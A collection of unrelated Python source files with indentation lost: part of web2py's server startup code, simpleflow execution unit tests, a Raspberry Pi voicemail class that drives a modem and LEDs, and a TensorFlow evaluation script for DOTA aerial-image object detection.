options.ips = []
if options.run_system_tests:
run_system_tests(options)
if options.quiet:
capture = cStringIO.StringIO()
sys.stdout = capture
logger.setLevel(logging.CRITICAL + 1)
else:
logger.setLevel(options.debuglevel)
if options.config[-3:] == '.py':
options.config = options.config[:-3]
if options.cronjob:
global_settings.cronjob = True # tell the world
options.plain = True # cronjobs use a plain shell
options.nobanner = True
options.nogui = True
options.folder = os.path.abspath(options.folder)
# accept --interfaces in the form
# "ip1:port1:key1:cert1:ca_cert1;[ip2]:port2;ip3:port3:key3:cert3"
# (no spaces; optional key:cert indicate SSL)
if isinstance(options.interfaces, str):
interfaces = options.interfaces.split(';')
options.interfaces = []
for interface in interfaces:
if interface.startswith('['): # IPv6
ip, if_remainder = interface.split(']', 1)
ip = ip[1:]
if_remainder = if_remainder[1:].split(':')
if_remainder[0] = int(if_remainder[0]) # numeric port
options.interfaces.append(tuple([ip] + if_remainder))
else: # IPv4
interface = interface.split(':')
interface[1] = int(interface[1]) # numeric port
options.interfaces.append(tuple(interface))
# accepts --scheduler in the form
# "app:group1,group2,app2:group1"
scheduler = []
options.scheduler_groups = None
if isinstance(options.scheduler, str):
if ':' in options.scheduler:
for opt in options.scheduler.split(','):
scheduler.append(opt.split(':'))
options.scheduler = ','.join([app[0] for app in scheduler])
options.scheduler_groups = scheduler
if options.numthreads is not None and options.minthreads is None:
options.minthreads = options.numthreads # legacy
create_welcome_w2p()
if not options.cronjob:
# If we have the applications package or if we should upgrade
if not os.path.exists('applications/__init__.py'):
write_file('applications/__init__.py', '')
return options, args
def check_existent_app(options, appname):
if os.path.isdir(os.path.join(options.folder, 'applications', appname)):
return True
def get_code_for_scheduler(app, options):
if len(app) == 1 or app[1] is None:
code = "from gluon import current;current._scheduler.loop()"
else:
code = "from gluon import current;current._scheduler.group_names = ['%s'];"
code += "current._scheduler.loop()"
code = code % ("','".join(app[1:]))
app_ = app[0]
if not check_existent_app(options, app_):
print "Application '%s' doesn't exist, skipping" % app_
return None, None
return app_, code
def start_schedulers(options):
try:
from multiprocessing import Process
except:
sys.stderr.write('Sorry, -K only supported for python 2.6-2.7\n')
return
processes = []
apps = [(app.strip(), None) for app in options.scheduler.split(',')]
if options.scheduler_groups:
apps = options.scheduler_groups
code = "from gluon import current;current._scheduler.loop()"
logging.getLogger().setLevel(options.debuglevel)
if len(apps) == 1 and not options.with_scheduler:
app_, code = get_code_for_scheduler(apps[0], options)
if not app_:
return
print 'starting single-scheduler for "%s"...' % app_
run(app_, True, True, None, False, code)
return
for app in apps:
app_, code = get_code_for_scheduler(app, options)
if not app_:
continue
print 'starting scheduler for "%s"...' % app_
args = (app_, True, True, None, False, code)
p = Process(target=run, args=args)
processes.append(p)
print "Currently running %s scheduler processes" % (len(processes))
p.start()
##to avoid bashing the db at the same time
time.sleep(0.7)
print "Processes started"
for p in processes:
try:
p.join()
except (KeyboardInterrupt, SystemExit):
print "Processes stopped"
except:
p.terminate()
p.join()
def start(cron=True):
""" Start server """
# ## get command line arguments
(options, args) = console()
if not options.nobanner:
print ProgramName
print ProgramAuthor
print ProgramVersion
from dal import DRIVERS
if not options.nobanner:
print 'Database drivers available: %s' % ', '.join(DRIVERS)
# ## if -L load options from options.config file
if options.config:
try:
options2 = __import__(options.config, {}, {}, '')
except Exception:
try:
# Jython doesn't like the extra stuff
options2 = __import__(options.config)
except Exception:
print 'Cannot import config file [%s]' % options.config
sys.exit(1)
for key in dir(options2):
if hasattr(options, key):
setattr(options, key, getattr(options2, key))
logfile0 = os.path.join('extras','examples','logging.example.conf')
if not os.path.exists('logging.conf') and os.path.exists(logfile0):
import shutil
sys.stdout.write("Copying logging.conf.example to logging.conf ... ")
shutil.copyfile('logging.example.conf', logfile0)
sys.stdout.write("OK\n")
# ## if -T run doctests (no cron)
if hasattr(options, 'test') and options.test:
test(options.test, verbose=options.verbose)
return
# ## if -S start interactive shell (also no cron)
if options.shell:
if not options.args is None:
sys.argv[:] = options.args
run(options.shell, plain=options.plain, bpython=options.bpython,
import_models=options.import_models, startfile=options.run,
cronjob=options.cronjob)
return
# ## if -C start cron run (extcron) and exit
# ## -K specifies optional apps list (overloading scheduler)
if options.extcron:
logger.debug('Starting extcron...')
global_settings.web2py_crontype = 'external'
if options.scheduler: # -K
apps = [app.strip() for app in options.scheduler.split(
',') if check_existent_app(options, app.strip())]
else:
apps = None
extcron = newcron.extcron(options.folder, apps=apps)
extcron.start()
extcron.join()
return
# ## if -K
if options.scheduler and not options.with_scheduler:
try:
start_schedulers(options)
except KeyboardInterrupt:
pass
return
# ## if -H cron is enabled in this *process*
# ## if --softcron use softcron
# ## use hardcron in all other cases
if cron and options.runcron and options.softcron:
print 'Using softcron (but this is not very efficient)'
global_settings.web2py_crontype = 'soft'
elif cron and options.runcron:
logger.debug('Starting hardcron...')
global_settings.web2py_crontype = 'hard'
newcron.hardcron(options.folder).start()
# ## if no password provided and havetk start Tk interface
# ## or start interface if we want to put in taskbar (system tray)
try:
options.taskbar
except:
options.taskbar = False
if options.taskbar and os.name != 'nt':
print 'Error: taskbar not supported on this platform'
sys.exit(1)
root = None
if not options.nogui and options.password=='<ask>':
try:
import Tkinter
havetk = True
try:
root = Tkinter.Tk()
except:
pass
except (ImportError, OSError):
logger.warn(
'GUI not available because Tk library is not installed')
havetk = False
options.nogui = True
if root:
root.focus_force()
# Mac OS X - make the GUI window rise to the top
if os.path.exists("/usr/bin/osascript"):
applescript = """
tell application "System Events"
set proc to first process whose unix id is %d
set frontmost of proc to true
end tell
""" % (os.getpid())
os.system("/usr/bin/osascript -e '%s'" % applescript)
master = web2pyDialog(root, options)
signal.signal(signal.SIGTERM, lambda a, b: master.quit())
try:
root.mainloop()
except:
master.quit()
sys.exit()
# ## if no tk and no password, ask for a password
if not root and options.password == '<ask>':
options.password = getpass.getpass('choose a password:')
if not options.password and not options.nobanner:
print 'no password, no admin interface'
# ##-X (if no tk, the widget takes care of it himself)
if not root and options.scheduler and options.with_scheduler:
t = threading.Thread(target=start_schedulers, args=(options,))
t.start()
# ## start server
# Use first interface IP and port if interfaces specified, since the
# interfaces option overrides the IP (and related) options.
if not options.interfaces:
(ip, port) = (options.ip, int(options.port))
else:
first_if = options.interfaces[0]
(ip, port) = first_if[0], first_if[1]
# Check for non default value for ssl inputs
if (len(options.ssl_certificate) > 0) or (len(options.ssl_private_key) > 0):
proto = 'https'
else:
proto = 'http'
url = get_url(ip, proto=proto, port=port)
if not options.nobanner:
print 'please visit:'
print '\t', url
print 'use "kill -SIGTERM %i" to shutdown the web2py server' % os.getpid()
# enhance linecache.getline (used by debugger) to look at the source file
# if the line was not found (under py2exe & when file was modified)
import linecache
py2exe_getline = linecache.getline
def getline(filename, lineno, *args, **kwargs):
line = py2exe_getline(filename, lineno, *args, **kwargs)
if not line:
try:
f = open(filename, "r")
try:
for i, line in enumerate(f):
if lineno == i + 1:
break
else:
line = None
finally:
f.close()
except (IOError, OSError):
line = None
return line
linecache.getline = getline
server = main.HttpServer(ip=ip,
port=port,
password=options.password,
pid_filename=options.pid_filename,
log_filename=options.log_filename,
profiler_dir=options.profiler_dir,
ssl_certificate=options.ssl_certificate,
ssl_private_key=options.ssl_private_key,
ssl_ca_certificate=options.ssl_ca_certificate,
min_threads=options.minthreads,
max_threads=options.maxthreads,
server_name=options.server_name,
request_queue_size=options.request_queue_size,
timeout=options.timeout,
socket_timeout=options.socket_timeout,
shutdown_timeout=options.shutdown_timeout,
path=options.folder,
interfaces=options.interfaces)
try:
server.start()
except KeyboardInterrupt:
server.stop()
try:
t.join()
except:
pass
logging.shutdown()
|
test_execute.py | # coding: utf-8
from __future__ import print_function
import json
import os.path
import platform
import subprocess
import sys
import tempfile
import threading
import time
import psutil
import pytest
from simpleflow import execute
from simpleflow.exceptions import ExecutionError, ExecutionTimeoutError
@execute.program(path="ls")
def ls_nokwargs(*args):
"""
Only accepts a variable number of positional arguments.
"""
pass
def test_execute_program_no_kwargs():
with tempfile.NamedTemporaryFile() as f:
with pytest.raises(TypeError) as exc_info:
ls_nokwargs(hide=f.name)
assert exc_info.value.args[0] == "command does not take keyword arguments"
@execute.program(path="ls")
def ls_noargs(**kwargs):
"""
Only accepts a variable number of keyword arguments.
"""
pass
def test_execute_program_no_args():
with tempfile.NamedTemporaryFile() as f:
with pytest.raises(TypeError) as exc_info:
ls_noargs(f.name)
assert exc_info.value.args[0] == "command does not take varargs"
@execute.program(path="ls")
def ls_restrict_named_arguments(hide=execute.RequiredArgument, *args):
pass
def test_execute_program_restrict_named_arguments():
with tempfile.NamedTemporaryFile() as f:
with pytest.raises(TypeError) as exc_info:
ls_restrict_named_arguments(f.name)
assert exc_info.value.args[0] == 'argument "hide" not found'
@execute.program(path="ls")
def ls_optional_named_arguments(hide="", *args):
pass
@pytest.mark.xfail(
platform.system() == "Darwin", reason="ls doesn't have a --hide option on MacOSX"
)
def test_execute_program_optional_named_arguments():
with tempfile.NamedTemporaryFile(suffix="\xe9") as f:
assert ls_optional_named_arguments(f.name).strip() == f.name
assert f.name not in ls_optional_named_arguments(hide=f.name)
@execute.program()
def ls(*args, **kwargs):
pass
def test_execute_program_with_positional_arguments():
with tempfile.NamedTemporaryFile() as f:
assert ls(f.name).strip() == f.name
@pytest.mark.xfail(
platform.system() == "Darwin", reason="ls doesn't have a --hide option on MacOSX"
)
def test_execute_program_with_named_arguments():
with tempfile.NamedTemporaryFile() as f:
assert f.name not in (ls(os.path.dirname(f.name), hide=f.name).strip())
@execute.program()
def ls_2args(a, b):
pass
def test_ls_2args():
with pytest.raises(TypeError) as exc_info:
ls_2args(1, 2, 3)
assert exc_info.value.args[0] == "command takes 2 arguments: 3 passed"
@execute.python()
def inc(xs):
return [x + 1 for x in xs]
def test_function_as_program():
assert inc([1, 2, 3]) == [2, 3, 4]
@execute.python()
def add(a, b=1):
return a + b
@execute.python()
class Add(object):
def __init__(self, a, b=1):
self.a = a
self.b = b
def execute(self):
return self.a + self.b
def test_function_as_program_with_default_kwarg():
assert add(4) == 5
assert Add(4) == 5
def test_function_as_program_with_kwargs():
assert add(3, 7) == 10
assert Add(3, 7) == 10
def test_function_as_program_raises_builtin_exception():
with pytest.raises(ExecutionError) as excinfo:
add("1")
assert '"error":"TypeError"' in str(excinfo.value)
with pytest.raises(ExecutionError) as excinfo:
Add("1")
assert '"error":"TypeError"' in str(excinfo.value)
@execute.python()
def print_string(s, retval):
print(s, end="")
return retval
@execute.python()
class PrintString(object):
def __init__(self, s, retval):
self.s = s
self.retval = retval
def execute(self):
print(self.s)
return self.retval
def test_function_with_print():
actual = print_string("This isn't part of the return value", None)
assert actual is None, actual
actual = PrintString("This isn't part of the return value", None)
assert actual is None, actual
def test_function_with_print_and_return():
assert print_string("This isn't part of the return value", 42) == 42
assert PrintString("This isn't part of the return value", 42) == 42
def test_function_returning_lf():
assert print_string("This isn't part of the return value", "a\nb") == "a\nb"
assert PrintString("This isn't part of the return value", "a\nb") == "a\nb"
class DummyException(Exception):
pass
@execute.python()
def raise_dummy_exception():
raise DummyException
@execute.python()
class RaiseDummyException(object):
def __init__(self):
pass
@staticmethod
def execute():
raise DummyException
def test_function_as_program_raises_custom_exception():
with pytest.raises(ExecutionError) as excinfo:
raise_dummy_exception()
assert '"error":"DummyException"' in str(excinfo.value)
with pytest.raises(ExecutionError) as excinfo:
RaiseDummyException()
assert '"error":"DummyException"' in str(excinfo.value)
@execute.python()
def raise_timeout_error():
from simpleflow.exceptions import TimeoutError
raise TimeoutError("timeout", 1)
def test_function_as_program_raises_module_exception():
with pytest.raises(ExecutionError) as excinfo:
raise_timeout_error()
assert '"error":"TimeoutError"' in str(excinfo.value)
@execute.python()
def warn():
import warnings
warnings.warn(
"The _posixsubprocess module is not being used. "
"Child process reliability may suffer if your "
"program uses threads.",
RuntimeWarning,
)
raise Exception("Fake Exception")
def test_function_with_warning():
try:
warn()
except Exception:
pass
else:
assert False
def test_function_returning_unicode():
assert print_string("", "ʘ‿ʘ") == u"ʘ‿ʘ"
@execute.python()
def raise_dummy_exception_with_unicode():
raise DummyException("ʘ‿ʘ")
def test_exception_with_unicode():
with pytest.raises(ExecutionError) as excinfo:
raise_dummy_exception_with_unicode()
assert '"error":"DummyException"' in str(excinfo.value)
error = json.loads(excinfo.value.args[0])
assert error["message"] == u"ʘ‿ʘ"
def sleep_and_return(seconds):
time.sleep(seconds)
return seconds
def test_timeout_execute():
timeout = 3 # TODO: the timeout should be smaller but as a workaround for Pypy slowness/overhead we set it to 3 sec
func = execute.python(timeout=timeout)(sleep_and_return)
# Normal case
result = func(0.25)
assert result == 0.25
# Timeout case
t = time.time()
with pytest.raises(ExecutionTimeoutError) as e:
func(10)
assert (time.time() - t) < 10.0
assert "ExecutionTimeoutError after {} seconds".format(timeout) in str(e.value)
def test_timeout_execute_from_thread():
# From a thread
t = threading.Thread(target=test_timeout_execute)
t.start()
t.join()
def create_sleeper_subprocess():
pid = subprocess.Popen(["sleep", "600"]).pid
return pid
@pytest.mark.xfail(
platform.system() == "Darwin" or "PyPy" in sys.version,
reason="psutil process statuses are buggy on OSX, and test randomly fails on PyPy",
)
def test_execute_dont_kill_children():
pid = execute.python()(create_sleeper_subprocess)()
subprocess = psutil.Process(pid)
assert subprocess.status() == "sleeping"
subprocess.terminate() # cleanup
def test_execute_kill_children():
pid = execute.python(kill_children=True)(create_sleeper_subprocess)()
with pytest.raises(psutil.NoSuchProcess):
psutil.Process(pid)
@execute.python()
def length(x):
return len(x)
def test_large_command_line():
x = "a" * 1024 * 1024
assert length(x) == len(x)
def test_large_command_line_unicode():
x = u"ä" * 1024 * 1024
assert length(x) == len(x)
def test_large_command_line_utf8():
"""
UTF-8 bytes must be handled as Unicode, both in Python 2 and Python 3.
"""
x = u"ä" * 1024 * 1024
assert length(x.encode("utf-8")) == len(x)
|
voicemail.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# messenger.py
#
# Copyright 2018 <pi@rhombus1>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import threading
from datetime import datetime
from messaging.message import Message
from hardware.indicators import MessageIndicator, MessageCountIndicator, \
GPIO_MESSAGE, GPIO_MESSAGE_COUNT_PINS, GPIO_MESSAGE_COUNT_KWARGS
class VoiceMail:
def __init__(self, db, config, modem):
"""
Initialize the database tables for voice messages.
"""
if config["DEBUG"]:
print("Initializing VoiceMail")
self.db = db
self.config = config
self.modem = modem
# Create a message event shared with the Message class used to monitor changes
self.message_event = threading.Event()
self.config["MESSAGE_EVENT"] = self.message_event
# Initialize the message indicators (LEDs)
self.message_indicator = MessageIndicator(
self.config.get("GPIO_LED_MESSAGE_PIN", GPIO_MESSAGE),
self.config.get("GPIO_LED_MESSAGE_BRIGHTNESS", 100),
self.config.get("GPIO_DISABLED", False)
)
pins = self.config.get("GPIO_LED_MESSAGE_COUNT_PINS", GPIO_MESSAGE_COUNT_PINS)
kwargs = self.config.get("GPIO_LED_MESSAGE_COUNT_KWARGS", GPIO_MESSAGE_COUNT_KWARGS)
self.message_count_indicator = MessageCountIndicator(self.config.get("GPIO_DISABLED", False), *pins, **kwargs)
# Create the Message object used to interface with the DB
self.messages = Message(db, config)
# Start the thread that monitors the message events and updates the indicators
self._stop_event = threading.Event()
self._thread = threading.Thread(target=self._event_handler)
self._thread.name = "voice_mail_event_handler"
self._thread.start()
# Pulse the indicator if an unplayed msg is waiting
self.reset_message_indicator()
if self.config["DEBUG"]:
print("VoiceMail initialized")
def stop(self):
"""
Stops the voice mail thread and releases hardware resources.
"""
self._stop_event.set()
self._thread.join()
self.message_indicator.close()
self.message_count_indicator.close()
def _event_handler(self):
"""
Thread function that updates the message indicators upon a message event.
"""
while not self._stop_event.is_set():
# Get the number of unread messages
if self.message_event.wait(2.0):
if self.config["DEBUG"]:
print("Message Event triggered")
self.reset_message_indicator()
def voice_messaging_menu(self, call_no, caller):
"""
Play a voice message menu and respond to the choices.
"""
# Build some common paths
voice_mail = self.config.get_namespace("VOICE_MAIL_")
voice_mail_menu_file = voice_mail['menu_file']
invalid_response_file = voice_mail['invalid_response_file']
goodbye_file = voice_mail['goodbye_file']
# Indicate the user is in the menu
self.message_indicator.blink()
tries = 0
wait_secs = 8 # Candidate for configuration
rec_msg = False
while tries < 3:
self.modem.play_audio(voice_mail_menu_file)
success, digit = self.modem.wait_for_keypress(wait_secs)
if not success:
break
if digit == '1':
self.record_message(call_no, caller)
rec_msg = True # prevent a duplicate reset_message_indicator
break
elif digit == '0':
# End this call
break
else:
# Try again--up to a limit
self.modem.play_audio(invalid_response_file)
tries += 1
self.modem.play_audio(goodbye_file)
if not rec_msg:
self.reset_message_indicator()
def record_message(self, call_no, caller, detect_silence=True):
"""
Records a message.
"""
# Build the filename used for a potential message
path = self.config["VOICE_MAIL_MESSAGE_FOLDER"]
filepath = os.path.join(path, "{}_{}_{}_{}.wav".format(
call_no,
caller["NMBR"],
caller["NAME"].replace('_', '-'),
datetime.now().strftime("%m%d%y_%H%M")))
# Play instructions to caller
leave_msg_file = self.config["VOICE_MAIL_LEAVE_MESSAGE_FILE"]
self.modem.play_audio(leave_msg_file)
# Show recording in progress
self.message_indicator.turn_on()
if self.modem.record_audio(filepath, detect_silence):
# Save to Message table (message.add will update the indicator)
msg_no = self.messages.add(call_no, filepath)
# Return the messageID on success
return msg_no
else:
self.reset_message_indicator()
# Return failure
return None
def delete_message(self, msg_no):
"""
Removes the message record and associated wav file.
"""
# Remove message and file (message.delete will update the indicator)
return self.messages.delete(msg_no)
def reset_message_indicator(self):
unplayed_count = self.messages.get_unplayed_count()
if self.config["DEBUG"]:
print("Resetting Message Indicator to show {} unplayed messages".format(unplayed_count))
if unplayed_count > 0:
self.message_indicator.pulse()
if unplayed_count < 10:
self.message_count_indicator.display(unplayed_count)
self.message_count_indicator.decimal_point = False
else:
self.message_count_indicator.display(9)
self.message_count_indicator.decimal_point = True
else:
self.message_indicator.turn_off()
self.message_count_indicator.display(' ')
self.message_count_indicator.decimal_point = False
|
test_dota.py | # -*- coding:utf-8 -*-
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
import os
import sys
import tensorflow as tf
import cv2
import numpy as np
import math
from tqdm import tqdm
import argparse
from multiprocessing import Queue, Process
sys.path.append("../")
from data.io.image_preprocess import short_side_resize_for_inference_data
from libs.networks import build_whole_network
from help_utils import tools
from libs.label_name_dict.label_dict import *
from libs.box_utils import draw_box_in_img
from libs.box_utils.cython_utils.cython_nms import nms, soft_nms
def worker(gpu_id, images, det_net, args, result_queue):
os.environ["CUDA_VISIBLE_DEVICES"] = str(gpu_id)
img_plac = tf.placeholder(dtype=tf.uint8, shape=[None, None, 3]) # is RGB. not BGR
img_batch = tf.cast(img_plac, tf.float32)
img_batch = short_side_resize_for_inference_data(img_tensor=img_batch,
target_shortside_len=cfgs.IMG_SHORT_SIDE_LEN[0],
length_limitation=cfgs.IMG_MAX_LENGTH)
if cfgs.NET_NAME in ['resnet152_v1d', 'resnet101_v1d', 'resnet50_v1d']:
img_batch = (img_batch / 255 - tf.constant(cfgs.PIXEL_MEAN_)) / tf.constant(cfgs.PIXEL_STD)
else:
img_batch = img_batch - tf.constant(cfgs.PIXEL_MEAN)
img_batch = tf.expand_dims(img_batch, axis=0)
detection_boxes, detection_scores, detection_category = det_net.build_whole_detection_network(
input_img_batch=img_batch,
gtboxes_batch=None,
gtboxes_r_batch=None)
init_op = tf.group(
tf.global_variables_initializer(),
tf.local_variables_initializer()
)
restorer, restore_ckpt = det_net.get_restorer()
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(init_op)
if not restorer is None:
restorer.restore(sess, restore_ckpt)
print('restore model %d ...' % gpu_id)
for img_path in images:
# if '2043' not in img_path:
# continue
img = cv2.imread(img_path)
box_res = []
label_res = []
score_res = []
imgH = img.shape[0]
imgW = img.shape[1]
if imgH < args.h_len:
temp = np.zeros([args.h_len, imgW, 3], np.float32)
temp[0:imgH, :, :] = img
img = temp
imgH = args.h_len
if imgW < args.w_len:
temp = np.zeros([imgH, args.w_len, 3], np.float32)
temp[:, 0:imgW, :] = img
img = temp
imgW = args.w_len
for hh in range(0, imgH, args.h_len - args.h_overlap):
if imgH - hh - 1 < args.h_len:
hh_ = imgH - args.h_len
else:
hh_ = hh
for ww in range(0, imgW, args.w_len - args.w_overlap):
if imgW - ww - 1 < args.w_len:
ww_ = imgW - args.w_len
else:
ww_ = ww
src_img = img[hh_:(hh_ + args.h_len), ww_:(ww_ + args.w_len), :]
resized_img, det_boxes_h_, det_scores_h_, det_category_h_ = \
sess.run(
[img_batch, detection_boxes, detection_scores, detection_category],
feed_dict={img_plac: src_img[:, :, ::-1]}
)
resized_h, resized_w = resized_img.shape[1], resized_img.shape[2]
src_h, src_w = src_img.shape[0], src_img.shape[1]
if len(det_boxes_h_) > 0:
det_boxes_h_[:, 0::2] *= (src_w / resized_w)
det_boxes_h_[:, 1::2] *= (src_h / resized_h)
for ii in range(len(det_boxes_h_)):
box = det_boxes_h_[ii]
box[0] = box[0] + ww_
box[1] = box[1] + hh_
box[2] = box[2] + ww_
box[3] = box[3] + hh_
box_res.append(box)
label_res.append(det_category_h_[ii])
score_res.append(det_scores_h_[ii])
box_res = np.array(box_res)
label_res = np.array(label_res)
score_res = np.array(score_res)
filter_indices = score_res >= 0.05
score_res = score_res[filter_indices]
box_res = box_res[filter_indices]
label_res = label_res[filter_indices]
box_res_ = []
label_res_ = []
score_res_ = []
threshold = {'roundabout': 0.35, 'tennis-court': 0.35, 'swimming-pool': 0.4, 'storage-tank': 0.3,
'soccer-ball-field': 0.3, 'small-vehicle': 0.4, 'ship': 0.35, 'plane': 0.35,
'large-vehicle': 0.4, 'helicopter': 0.4, 'harbor': 0.3, 'ground-track-field': 0.4,
'bridge': 0.3, 'basketball-court': 0.4, 'baseball-diamond': 0.3}
for sub_class in range(1, cfgs.CLASS_NUM + 1):
index = np.where(label_res == sub_class)[0]
if len(index) == 0:
continue
tmp_boxes_h = box_res[index]
tmp_label_h = label_res[index]
tmp_score_h = score_res[index]
tmp_boxes_h = np.array(tmp_boxes_h)
tmp = np.zeros([tmp_boxes_h.shape[0], tmp_boxes_h.shape[1] + 1])
tmp[:, 0:-1] = tmp_boxes_h
tmp[:, -1] = np.array(tmp_score_h)
if cfgs.SOFT_NMS:
inx = soft_nms(np.array(tmp, np.float32), 0.5, Nt=threshold[LABEL_NAME_MAP[sub_class]],
threshold=0.001, method=2) # 2 means Gaussian
else:
inx = nms(np.array(tmp, np.float32),
threshold[LABEL_NAME_MAP[sub_class]])
box_res_.extend(np.array(tmp_boxes_h)[inx])
score_res_.extend(np.array(tmp_score_h)[inx])
label_res_.extend(np.array(tmp_label_h)[inx])
result_dict = {'boxes': np.array(box_res_), 'scores': np.array(score_res_),
'labels': np.array(label_res_), 'image_id': img_path}
result_queue.put_nowait(result_dict)
def test_dota(det_net, real_test_img_list, args, txt_name):
save_path = os.path.join('./test_dota', cfgs.VERSION)
nr_records = len(real_test_img_list)
pbar = tqdm(total=nr_records)
gpu_num = len(args.gpus.strip().split(','))
nr_image = math.ceil(nr_records / gpu_num)
result_queue = Queue(500)
procs = []
for i, gpu_id in enumerate(args.gpus.strip().split(',')):
start = i * nr_image
end = min(start + nr_image, nr_records)
split_records = real_test_img_list[start:end]
proc = Process(target=worker, args=(int(gpu_id), split_records, det_net, args, result_queue))
print('process:%d, start:%d, end:%d' % (i, start, end))
proc.start()
procs.append(proc)
for i in range(nr_records):
res = result_queue.get()
if args.show_box:
nake_name = res['image_id'].split('/')[-1]
tools.mkdir(os.path.join(save_path, 'dota_img_vis'))
draw_path = os.path.join(save_path, 'dota_img_vis', nake_name)
draw_img = np.array(cv2.imread(res['image_id']), np.float32)
detected_indices = res['scores'] >= cfgs.SHOW_SCORE_THRSHOLD
detected_scores = res['scores'][detected_indices]
detected_boxes = res['boxes'][detected_indices]
detected_categories = res['labels'][detected_indices]
final_detections = draw_box_in_img.draw_boxes_with_label_and_scores(draw_img,
boxes=detected_boxes,
labels=detected_categories,
scores=detected_scores,
method=0,
in_graph=False)
cv2.imwrite(draw_path, final_detections)
else:
CLASS_DOTA = NAME_LABEL_MAP.keys()
write_handle = {}
tools.mkdir(os.path.join(save_path, 'dota_res'))
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class] = open(os.path.join(save_path, 'dota_res', 'Task1_%s.txt' % sub_class), 'a+')
hboxes = res['boxes']
for i, hbox in enumerate(hboxes):
command = '%s %.3f %.1f %.1f %.1f %.1f\n' % (res['image_id'].split('/')[-1].split('.')[0],
res['scores'][i],
hbox[0], hbox[1], hbox[2], hbox[3])
write_handle[LABEL_NAME_MAP[res['labels'][i]]].write(command)
for sub_class in CLASS_DOTA:
if sub_class == 'back_ground':
continue
write_handle[sub_class].close()
fw = open(txt_name, 'a+')
fw.write('{}\n'.format(res['image_id'].split('/')[-1]))
fw.close()
pbar.set_description("Test image %s" % res['image_id'].split('/')[-1])
pbar.update(1)
for p in procs:
p.join()
def eval(num_imgs, args):
txt_name = '{}.txt'.format(cfgs.VERSION)
if not args.show_box:
if not os.path.exists(txt_name):
fw = open(txt_name, 'w')
fw.close()
fr = open(txt_name, 'r')
img_filter = fr.readlines()
print('****************************'*3)
print('Already tested imgs:', img_filter)
print('****************************'*3)
fr.close()
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff')) and
(img_name + '\n' not in img_filter)]
else:
test_imgname_list = [os.path.join(args.test_dir, img_name) for img_name in os.listdir(args.test_dir)
if img_name.endswith(('.jpg', '.png', '.jpeg', '.tif', '.tiff'))]
assert len(test_imgname_list) != 0, 'test_dir has no imgs there.' \
' Note that, we only support img format of (.jpg, .png, and .tiff) '
if num_imgs == np.inf:
real_test_img_list = test_imgname_list
else:
real_test_img_list = test_imgname_list[: num_imgs]
fpn = build_whole_network.DetectionNetwork(
base_network_name=cfgs.NET_NAME,
is_training=False)
test_dota(det_net=fpn, real_test_img_list=real_test_img_list, args=args, txt_name=txt_name)
if not args.show_box:
os.remove(txt_name)
def parse_args():
parser = argparse.ArgumentParser('evaluate the result.')
parser.add_argument('--test_dir', dest='test_dir',
help='evaluate imgs dir ',
default='/data/dataset/DOTA/test/images/', type=str)
parser.add_argument('--gpus', dest='gpus',
help='gpu id',
default='0,1,2,3,4,5,6,7', type=str)
parser.add_argument('--eval_num', dest='eval_num',
help='the num of eval imgs',
default=np.inf, type=int)
parser.add_argument('--show_box', '-s', default=False,
action='store_true')
parser.add_argument('--h_len', dest='h_len',
help='image height',
default=800, type=int)
parser.add_argument('--w_len', dest='w_len',
help='image width',
default=800, type=int)
parser.add_argument('--h_overlap', dest='h_overlap',
help='height overlap',
default=200, type=int)
parser.add_argument('--w_overlap', dest='w_overlap',
help='width overlap',
default=200, type=int)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print(20*"--")
print(args)
print(20*"--")
eval(args.eval_num,
args=args)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.